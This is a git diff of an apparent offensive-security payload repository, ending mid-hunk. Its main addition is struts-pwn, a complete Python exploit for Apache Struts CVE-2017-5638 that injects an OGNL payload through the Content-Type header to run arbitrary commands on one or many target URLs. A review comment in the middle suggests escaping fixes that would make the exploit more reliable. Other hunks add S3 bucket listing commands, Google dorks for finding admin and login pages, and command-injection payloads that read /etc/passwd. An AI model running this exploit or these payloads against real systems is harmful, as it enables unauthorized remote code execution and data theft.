diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index d8c0280..36fcd21 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -17,7 +17,12 @@ aws s3 mv test.txt s3://hackerone.files SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt" ``` -Bucket Finder +Basic test +``` +aws s3 ls s3://targetbucket +``` + +### Bucket Finder A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files. ``` wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 @@ -42,3 +47,4 @@ List of the top Alexa 100,000 sites with permutations on the TLD and www. For ex ## Thanks to * https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets * https://digi.ninja/projects/bucket_finder.php +* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792) diff --git a/CVE Shellshock Heartbleed Struts2/Apache Struts2.py b/CVE Shellshock Heartbleed Struts2/Apache Struts2.py new file mode 100644 index 0000000..df93d83 --- /dev/null +++ b/CVE Shellshock Heartbleed Struts2/Apache Struts2.py 
@@ -0,0 +1,176 @@
+#!/usr/bin/env python3
+# coding=utf-8
+# *****************************************************
+# struts-pwn: Apache Struts CVE-2017-5638 Exploit
+# Author:
+# Mazin Ahmed
+# This code is based on:
+# https://www.exploit-db.com/exploits/41570/
+# https://www.seebug.org/vuldb/ssvid-92746
+# *****************************************************
+import sys
+import random
+import requests
+import argparse
+
+# Disable SSL warnings
+try:
+ import requests.packages.urllib3
+ requests.packages.urllib3.disable_warnings()
+except:
+ pass
+
+if len(sys.argv) <= 1:
+ print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
+ print('[*] Struts-PWN - @mazen160')
+ print('\n%s -h for help.' % (sys.argv[0]))
+ exit(0)
+
+parser = argparse.ArgumentParser()
+parser.add_argument("-u", "--url",
+ dest="url",
+ help="Check a single URL.",
+ action='store')
+parser.add_argument("-l", "--list",
+ dest="usedlist",
+ help="Check a list of URLs.",
+ action='store')
+parser.add_argument("-c", "--cmd",
+ dest="cmd",
+ help="Command to execute. (Default: id)",
+ action='store',
+ default='id')
+parser.add_argument("--check",
+ dest="do_check",
+ help="Check if a target is vulnerable.",
+ action='store_true')
+args = parser.parse_args()
+url = args.url if args.url else None
+usedlist = args.usedlist if args.usedlist else None
+url = args.url if args.url else None
+cmd = args.cmd if args.cmd else None
+do_check = args.do_check if args.do_check else None
+
+
+def url_prepare(url):
+ url = url.replace('#', '%23')
+ url = url.replace(' ', '%20')
+ if ('://' not in url):
+ url = str('http') + str('://') + str(url)
+ return(url)
+
+
+def exploit(url, cmd):
+ url = url_prepare(url)
+ print('\n[*] URL: %s' % (url))
+ print('[*] CMD: %s' % (cmd))
+
+ payload = "%{(#_='multipart/form-data')."
+ payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
+ payload += "(#_memberAccess?"
+ payload += "(#_memberAccess=#dm):"
+ payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+ payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+ payload += "(#ognlUtil.getExcludedPackageNames().clear())."
+ payload += "(#ognlUtil.getExcludedClasses().clear())."
+ payload += "(#context.setMemberAccess(#dm))))."
+ payload += "(#cmd='%s')." % cmd
+ payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+ payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
+ payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
+ payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
+ payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+ payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+ payload += "(#ros.flush())}"
+
+ headers = {
+ 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
+ # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
+ 'Content-Type': str(payload),
+ 'Accept': '*/*'
+ }
+
+ timeout = 3
+ try:
+ output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
+ except Exception as e:
+ print("EXCEPTION::::--> " + str(e))
+ output = 'ERROR'
+ return(output)
+
+
+def check(url):
+ url = url_prepare(url)
+ print('\n[*] URL: %s' % (url))
+
+ random_string = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for i in range(7))
+
+ payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']."
+ payload += "addHeader('%s','%s')}.multipart/form-data" % (random_string, random_string)
+ headers = {
+ 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
+ # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
+ 'Content-Type': str(payload),
+ 'Accept': '*/*'
+ }
+
+ timeout = 3
+ try:
+ resp = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
+ if ((random_string in resp.headers.keys()) and (resp.headers[random_string] == random_string)):
+ result = True
+ else:
+ result = False
+ except Exception as e:
+ print("EXCEPTION::::--> " + str(e))
+ result = False
+ return(result)
+
+
+def main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check):
+ if url:
+ if do_check:
+ result = check(url) # Only check for existence of Vulnerablity
+ output = '[*] Status: '
+ if result is True:
+ output += 'Vulnerable!'
+ else:
+ output += 'Not Affected.'
+ else:
+ output = exploit(url, cmd) # Exploit
+ print(output)
+
+ if usedlist:
+ URLs_List = []
+ try:
+ f_file = open(str(usedlist), 'r')
+ URLs_List = f_file.read().replace('\r', '').split('\n')
+ try:
+ URLs_List.remove('')
+ except ValueError:
+ pass
+ f_file.close()
+ except:
+ print('Error: There was an error in reading list file.')
+ exit(1)
+ for url in URLs_List:
+ if do_check:
+ result = check(url) # Only check for existence of Vulnerablity
+ output = '[*] Status: '
+ if result is True:
+ output += 'Vulnerable!'
+ else:
+ output += 'Not Affected.'
+ else:
+ output = exploit(url, cmd) # Exploit
+ print(output)
+
+ print('[%] Done.')
+
+if __name__ == '__main__':
+ try:
+ main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check)
+ except KeyboardInterrupt:
+ print('\nKeyboardInterrupt Detected.')
+ print('Exiting...')
+ exit(0)
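Review bot: In exploit(), the operator-supplied command is interpolated into the OGNL payload with no escaping at `payload += "(#cmd='%s')." % cmd`, so a command containing a single quote (or a trailing backslash) closes the `#cmd` literal early and the expression no longer parses — the target then returns its ordinary response body and nothing tells the operator the payload was malformed rather than the host unaffected. OGNL string literals accept Java-style backslash escapes, so the minimal fix is `safe_cmd = cmd.replace('\\', '\\\\').replace("'", "\\'")` and interpolating `safe_cmd` in that line, though I have not verified that every affected Struts build treats escaped backslashes identically. Two smaller items in the same hunk: `url = args.url if args.url else None` is assigned twice at module level, and the list loader in main() wraps open/read/close in a bare `except:` that discards the real I/O error — `with open(str(usedlist), 'r') as f_file:` plus `except OSError as e:` would close the file on every path and report the cause. Since check() is a non-destructive header-echo probe while the default mode (no `--check`) runs `id` on every target in the list, the help text for `--check` should say so explicitly so a scan of a URL list is not run in command-execution mode by accident.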
diff --git a/CVE Shellshock Heartbleed/Heartbleed.py b/CVE Shellshock Heartbleed Struts2/Heartbleed.py
similarity index 100%
rename from CVE Shellshock Heartbleed/Heartbleed.py
rename to CVE Shellshock Heartbleed Struts2/Heartbleed.py
diff --git a/CVE Shellshock Heartbleed/README.md b/CVE Shellshock Heartbleed Struts2/README.md
similarity index 64%
rename from CVE Shellshock Heartbleed/README.md
rename to CVE Shellshock Heartbleed Struts2/README.md
index f90ee34..5353a98 100644
--- a/CVE Shellshock Heartbleed/README.md
+++ b/CVE Shellshock Heartbleed Struts2/README.md
@@ -1,13 +1,16 @@ # Common Vulnerabilities and Exposures -Big CVEs in the last 5 years. +Big CVEs in the last 5 years. -## Heartbleed +## CVE-2014-0160 - Heartbleed The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs). -## Shellshock +## CVE-2014-6271 - Shellshock Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. +## CVE-2017-5638 - Apache Struts 2 +On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header. ## Thanks to * http://heartbleed.com * https://en.wikipedia.org/wiki/Shellshock_(software_bug) +* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/) diff --git a/CVE Shellshock Heartbleed/Shellshock.py b/CVE Shellshock Heartbleed Struts2/Shellshock.py similarity index 100% rename from CVE Shellshock Heartbleed/Shellshock.py rename to CVE Shellshock Heartbleed Struts2/Shellshock.py diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md index 760a9cb..9d553c8 100644 --- a/Methodology_and_enumeration.md 
+++ b/Methodology_and_enumeration.md @@ -15,13 +15,16 @@ git clone https://github.com/danielmiessler/SecLists.git knockpy domain.com -w subdomains-top1mil-110000.txt ``` -* Using Google Dorks +* Using Google Dorks and Google Transparency Report ```bash site:*.domain.com -www site:http://domain.com filetype:pdf site:http://domain.com inurl:& site:http://domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin site:http://domain.com ext:php,asp,aspx,jsp,jspa,txt,swf + +You need to include subdomains ;) +https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true ``` * Subdomain take over using HostileSubBruteForcer diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 958bc56..ff25192 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -1,14 +1,14 @@ # Remote Code Execution Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server. - + ## Exploits Normal code execution, execute the command and voila :p ``` -cat /etc/passwd -root:x:0:0:root:/root:/bin/bash -daemon:x:1:1:daemon:/usr/sbin:/bin/sh -bin:x:2:2:bin:/bin:/bin/sh +cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh ``` @@ -19,7 +19,7 @@ original_cmd_by_server && ls original_cmd_by_server | ls ``` -Code execution without space +Code execution without space - Linux ``` swissky@crashlab▸ ~ ▸ $ {cat,/etc/passwd} root:x:0:0:root:/root:/bin/bash @@ -40,6 +40,12 @@ Linux crashlab 4.4.X-XX-generic #72-Ubuntu swissky@crashlab▸ ~ ▸ $ sh